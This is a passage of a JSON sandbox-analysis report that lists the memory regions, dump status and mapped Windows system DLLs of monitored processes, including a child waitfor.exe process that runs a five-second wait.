"memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:17.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_502", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:17.264", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000503-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_503", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:17.264", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791785144320, "type": "region", "version": 1 }, "end_va": 8791785148415, "entry_point": 8791785144320, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_504", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791785144320, "timestamp": "00:00:17.264", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_505", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:00:17.264", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000506-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_506", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:00:17.264", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000507-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_507", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:00:17.264", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_518", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:17.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_519", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:17.427", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000520-addr_0x0000000000400000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_520", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:00:17.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 1995898880, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_521", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995898880, "timestamp": "00:00:17.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791751000064, "type": "region", "version": 1 }, "end_va": 8791751438335, "entry_point": 8791751000064, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_522", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751000064, "timestamp": "00:00:17.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_525", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:17.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_526", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:17.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_527", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:17.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 1994850304, "filename": "\\Windows\\System32\\user32.dll", "id": "region_528", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1994850304, "timestamp": "00:00:17.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_529", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:17.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_530", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:17.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791616192512, "type": "region", "version": 1 }, "end_va": 8791616225279, "entry_point": 8791616192512, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_531", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 8791616192512, "timestamp": "00:00:17.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791752507392, "type": "region", "version": 1 }, "end_va": 8791752564735, "entry_point": 8791752507392, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_532", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791752507392, "timestamp": "00:00:17.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791752572928, "type": "region", "version": 1 }, "end_va": 8791753396223, "entry_point": 8791752572928, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_533", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791752572928, "timestamp": "00:00:17.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791767842816, "type": "region", "version": 1 }, "end_va": 8791768264703, "entry_point": 8791767842816, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_534", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791767842816, "timestamp": "00:00:17.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791780753408, "type": "region", "version": 1 }, "end_va": 8791781404671, "entry_point": 8791780753408, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_535", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791780753408, "timestamp": "00:00:17.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_536", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:17.590", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000537-addr_0x00000000000d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 917503, "entry_point": 0, "filename": null, "id": "region_537", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:00:17.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_538", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:00:17.591", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000539-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_539", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:17.591", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000540-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_540", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:17.591", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000541-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_541", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:17.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 6848511, "entry_point": 0, "filename": null, "id": "region_542", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:00:17.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 8458239, "entry_point": 0, "filename": null, "id": "region_543", "name": "pagefile_0x0000000000690000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6881280, "timestamp": "00:00:17.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8519680, "type": "region", "version": 1 }, "end_va": 29491199, "entry_point": 0, "filename": null, "id": "region_544", "name": "pagefile_0x0000000000820000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8519680, "timestamp": "00:00:17.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 32911359, "entry_point": 0, "filename": null, "id": "region_545", "name": "pagefile_0x0000000001c20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29491200, "timestamp": "00:00:17.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791767646208, "type": "region", "version": 1 }, "end_va": 8791767834623, "entry_point": 8791767646208, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_546", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791767646208, "timestamp": "00:00:17.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791777017856, "type": "region", "version": 1 }, "end_va": 8791778103295, "entry_point": 8791777017856, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_547", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791777017856, "timestamp": "00:00:17.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 35909631, "entry_point": 32964608, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_548", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32964608, "timestamp": "00:00:17.618", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "waitfor /t 5 YKERQ ", "filename": "c:\\windows\\system32\\waitfor.exe", "id": "proc_3", "image_name": "waitfor.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000549-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_549", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:17.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_550", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:17.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_551", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:17.623", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000552-addr_0x00000000000f0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_552", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:17.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_553", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:17.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_554", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:17.624", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000555-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_162", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_555", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:17.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 4281794560, "type": "region", "version": 1 }, "end_va": 4281855999, "entry_point": 4281794560, "filename": "\\Windows\\System32\\waitfor.exe", "id": "region_556", "name": "waitfor.exe", "norm_filename": "c:\\windows\\system32\\waitfor.exe", "region_type": "memory_mapped_file", "start_va": 4281794560, "timestamp": "00:00:17.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791785144320, "type": "region", "version": 1 }, "end_va": 8791785148415, "entry_point": 8791785144320, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_557", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791785144320, "timestamp": "00:00:17.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_558", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:00:17.671", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000559-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_163", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_559", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:00:17.672", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000560-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_164", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_560", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:00:17.672", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000561-addr_0x00000000002a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_561", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:00:17.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 1995898880, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_562", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995898880, "timestamp": "00:00:17.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791751000064, "type": "region", "version": 1 }, "end_va": 8791751438335, "entry_point": 8791751000064, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_563", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751000064, "timestamp": "00:00:17.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_564", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:17.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_565", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:17.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_566", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:17.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_567", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:17.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_568", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:17.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 929791, "entry_point": 917504, "filename": "\\Windows\\System32\\en-US\\waitfor.exe.mui", "id": "region_569", "name": "waitfor.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\waitfor.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:00:17.703", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000570-addr_0x0000000000170000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_570", "name": "private_0x0000000000170000", "norm_filename": null, 